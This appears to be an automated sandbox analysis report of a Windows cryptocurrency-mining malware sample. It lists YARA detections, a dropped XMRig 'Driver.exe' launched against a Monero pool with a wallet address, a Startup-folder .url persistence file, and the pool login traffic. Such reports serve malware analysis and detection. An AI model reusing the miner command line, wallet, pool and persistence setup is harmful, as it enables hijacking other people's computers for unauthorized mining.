Source: Yara match | File source: dump.pcap, type: PCAP |
Source: Yara match | File source: 00000002.00000002.823432979.000001C49DE04000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000002.822561306.000000000053B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000002.822561306.0000000000518000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: 01904399.dat.exe PID: 5684, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: Driver.exe PID: 4628, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: conhost.exe PID: 5468, type: MEMORYSTR |
Source: global traffic | TCP traffic: 192.168.2.4:49694 -> 141.94.96.71:3333 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"427x8gux5jrrgk4v7grcwk85mwpjcan7djgqbabcetdqc5bivy27pept3ctx43qmladkaardf4kw4hiozmdq7ehrnczdnfm","pass":"x","agent":"xmrig/6.2.2 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2019","algo":["cn/0","cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn-lite/0","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/ccx","rx/0","rx/wow","rx/loki","rx/arq","rx/sfx","rx/keva","argon2/chukwa","argon2/wrkz","astrobwt","kawpow"]}}. |
Source: C:\Users\user\Desktop\01904399.dat.exe | Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h | 0_2_00FCBAA8 |
Source: C:\Users\user\Desktop\01904399.dat.exe | Code function: 4x nop then jmp 00FC0FA9h | 0_2_00FC0E48 |
Source: C:\Users\user\Desktop\01904399.dat.exe | Code function: 4x nop then jmp 00FC2A7Eh | 0_2_00FC2613 |
Source: C:\Users\user\Desktop\01904399.dat.exe | Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h | 0_2_00FC08E0 |
Source: C:\Users\user\Desktop\01904399.dat.exe | Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h | 0_2_00FC018C |
Source: C:\Users\user\Desktop\01904399.dat.exe | Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h | 0_2_00FC0189 |
Source: C:\Users\user\Desktop\01904399.dat.exe | Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h | 0_2_00FCBA9D |
Source: C:\Users\user\Desktop\01904399.dat.exe | Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h | 0_2_00FCC3C8 |
Source: C:\Users\user\Desktop\01904399.dat.exe | Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h | 0_2_00FCC3BD |
Source: C:\Users\user\Desktop\01904399.dat.exe | Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h | 0_2_00FC452C |
Source: C:\Users\user\Desktop\01904399.dat.exe | Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h | 0_2_00FC652D |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h | 3_2_0147B398 |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Code function: 4x nop then jmp 014726B6h | 3_2_0147224B |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h | 3_2_0147018C |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h | 3_2_014708E0 |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h | 3_2_0147B38D |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h | 3_2_014732D0 |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h | 3_2_0147BCAD |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h | 3_2_0147BCB8 |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Code function: 4x nop then jmp 01470FA9h | 3_2_01470E48 |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Code function: 4x nop then jmp 01470FA9h | 3_2_01470E58 |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h | 3_2_01475E1C |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Code function: 4x nop then jmp 00F524F6h | 4_2_00F5208B |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h | 4_2_00F5B398 |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h | 4_2_00F508E0 |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h | 4_2_00F5018C |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h | 4_2_00F50189 |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h | 4_2_00F532D0 |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h | 4_2_00F5B38D |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h | 4_2_00F5BCB8 |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h | 4_2_00F5BCAD |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Code function: 4x nop then jmp 00F50FA9h | 4_2_00F50E48 |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h | 4_2_00F55E1C |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Code function: 4x nop then jmp 02FD24F6h | 5_2_02FD208B |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Code function: 4x nop then jmp 02FD0FA9h | 5_2_02FD0E48 |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h | 5_2_02FD08E0 |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h | 5_2_02FD018C |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h | 5_2_02FD0189 |
Source: 01904399.dat.exe, Driver.exe.0.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0 |
Source: 01904399.dat.exe, Driver.exe.0.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0 |
Source: 01904399.dat.exe, Driver.exe.0.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0 |
Source: 01904399.dat.exe, Driver.exe.0.dr | String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q |
Source: 01904399.dat.exe, Driver.exe.0.dr | String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t |
Source: 01904399.dat.exe, Driver.exe.0.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08 |
Source: 01904399.dat.exe, Driver.exe.0.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0: |
Source: 01904399.dat.exe, Driver.exe.0.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P |
Source: 01904399.dat.exe, Driver.exe.0.dr | String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02 |
Source: 01904399.dat.exe, Driver.exe.0.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w |
Source: 01904399.dat.exe, Driver.exe.0.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0 |
Source: 01904399.dat.exe, Driver.exe.0.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0: |
Source: 01904399.dat.exe, Driver.exe.0.dr | String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0 |
Source: 01904399.dat.exe, Driver.exe.0.dr | String found in binary or memory: http://ocsp.comodoca.com0 |
Source: 01904399.dat.exe, Driver.exe.0.dr | String found in binary or memory: http://ocsp.digicert.com0A |
Source: 01904399.dat.exe, Driver.exe.0.dr | String found in binary or memory: http://ocsp.digicert.com0C |
Source: 01904399.dat.exe, Driver.exe.0.dr | String found in binary or memory: http://ocsp.digicert.com0O |
Source: 01904399.dat.exe, Driver.exe.0.dr | String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0 |
Source: 01904399.dat.exe, Driver.exe.0.dr | String found in binary or memory: https://www.digicert.com/CPS0 |
Source: 01904399.dat.exe, type: SAMPLE | Matched rule: MALWARE_Win_CoinMiner04 author = ditekSHen, description = Detects coinmining malware |
Source: 0.0.01904399.dat.exe.380000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_CoinMiner04 author = ditekSHen, description = Detects coinmining malware |
Source: 00000001.00000002.822561306.0000000000510000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth (Nextron Systems), description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero |
Source: Process Memory Space: 01904399.dat.exe PID: 5684, type: MEMORYSTR | Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth (Nextron Systems), description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero |
Source: Process Memory Space: Driver.exe PID: 4628, type: MEMORYSTR | Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth (Nextron Systems), description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url, type: DROPPED | Matched rule: URL_File_Local_EXE date = 2017-10-04, author = Florian Roth (Nextron Systems), description = Detects an .url file that points to a local executable, score = , reference = https://twitter.com/malwareforme/status/915300883012870144, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url, type: DROPPED | Matched rule: Methodology_Suspicious_Shortcut_Local_URL author = @itsreallynick (Nick Carr), @QW5kcmV3 (Andrew Thompson), description = Detects local script usage for .URL persistence, score = 27.09.2019, reference = https://twitter.com/cglyer/status/1176184798248919044 |
Source: C:\Users\user\Desktop\01904399.dat.exe | Code function: 0_2_00FC2AE8 | 0_2_00FC2AE8 |
Source: C:\Users\user\Desktop\01904399.dat.exe | Code function: 0_2_00FCAFD0 | 0_2_00FCAFD0 |
Source: C:\Users\user\Desktop\01904399.dat.exe | Code function: 0_2_00FCC788 | 0_2_00FCC788 |
Source: C:\Users\user\Desktop\01904399.dat.exe | Code function: 0_2_00FCA1A0 | 0_2_00FCA1A0 |
Source: C:\Users\user\Desktop\01904399.dat.exe | Code function: 0_2_00FC2AD9 | 0_2_00FC2AD9 |
Source: C:\Users\user\Desktop\01904399.dat.exe | Code function: 0_2_00FC9C50 | 0_2_00FC9C50 |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Code function: 3_2_0147A8C0 | 3_2_0147A8C0 |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Code function: 3_2_01472720 | 3_2_01472720 |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Code function: 3_2_01479A90 | 3_2_01479A90 |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Code function: 3_2_01479540 | 3_2_01479540 |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Code function: 3_2_0147270F | 3_2_0147270F |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Code function: 4_2_00F5A8C0 | 4_2_00F5A8C0 |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Code function: 4_2_00F52560 | 4_2_00F52560 |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Code function: 4_2_00F59A90 | 4_2_00F59A90 |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Code function: 4_2_00F59540 | 4_2_00F59540 |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Code function: 4_2_00F5254F | 4_2_00F5254F |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Code function: 5_2_02FD2560 | 5_2_02FD2560 |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Code function: 5_2_02FD254F | 5_2_02FD254F |
Source: 01904399.dat.exe, 00000000.00000000.553802307.000000000077A000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilename0 vs 01904399.dat.exe |
Source: 01904399.dat.exe, 00000000.00000002.588365499.0000000000B9A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs 01904399.dat.exe |
Source: 01904399.dat.exe, 00000003.00000002.645598292.00000000010EA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs 01904399.dat.exe |
Source: 01904399.dat.exe, 00000004.00000002.714201052.0000000000DF0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs 01904399.dat.exe |
Source: 01904399.dat.exe, 00000005.00000002.647446627.000000000139A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs 01904399.dat.exe |
Source: 01904399.dat.exe | Binary or memory string: OriginalFilename0 vs 01904399.dat.exe |
Source: unknown | Process created: C:\Users\user\Desktop\01904399.dat.exe C:\Users\user\Desktop\01904399.dat.exe | |
Source: C:\Users\user\Desktop\01904399.dat.exe | Process created: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 427X8guX5JRRGk4v7gRcwK85MwpjCAN7djGqBAbCETdqc5biVY27pePT3Ctx43QMLAdKAaRDF4KW4HiozmdQ7EHrNczdnfM -p x -k -v=0 --donate-level=1 -t 2 | |
Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: unknown | Process created: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe "C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe" | |
Source: unknown | Process created: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe "C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe" | |
Source: unknown | Process created: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe "C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe" | |
Source: C:\Users\user\Desktop\01904399.dat.exe | Process created: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 427X8guX5JRRGk4v7gRcwK85MwpjCAN7djGqBAbCETdqc5biVY27pePT3Ctx43QMLAdKAaRDF4KW4HiozmdQ7EHrNczdnfM -p x -k -v=0 --donate-level=1 -t 2 | Jump to behavior |
Source: C:\Users\user\Desktop\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: conhost.exe, 00000002.00000002.822792386.000001C49C5C0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: EProgram Managerzx |
Source: conhost.exe, 00000002.00000002.822792386.000001C49C5C0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd |
Source: conhost.exe, 00000002.00000002.822792386.000001C49C5C0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman |
Source: conhost.exe, 00000002.00000002.822792386.000001C49C5C0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock |
Source: C:\Users\user\Desktop\01904399.dat.exe | Queries volume information: C:\Users\user\Desktop\01904399.dat.exe VolumeInformation | Jump to behavior |
Source: C:\Users\user\Desktop\01904399.dat.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Queries volume information: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Queries volume information: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Queries volume information: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation | Jump to behavior |